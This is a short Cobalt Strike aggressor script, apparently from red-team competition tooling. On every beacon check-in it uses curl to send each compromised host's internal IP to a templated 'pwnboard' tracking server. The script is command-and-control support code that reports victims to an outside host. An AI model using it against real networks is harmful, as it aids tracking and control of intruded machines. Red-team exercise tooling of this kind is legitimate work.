#
# Save this file as a ags file and load the script into Cobalt Strike
# Everytime a beacon calls back the pwnboard will be updated
#
sub update_pwnboard {
    local('$pwnboard_url @curl_command');
    $pwnboard_url = '{{ server }}/generic';
    @curl_command = @('curl','-X','POST', '-H', 'Content-Type: application/json', '-d', '{"ip":"' . $2 . '","type":"cobaltstrike"}', $pwnboard_url);
    exec(@curl_command);
}
on beacon_checkin {
    local('$internal');
    $internal = beacon_info($1, "internal");
    update_pwnboard($1, $internal);
    bcheckin($1);
}
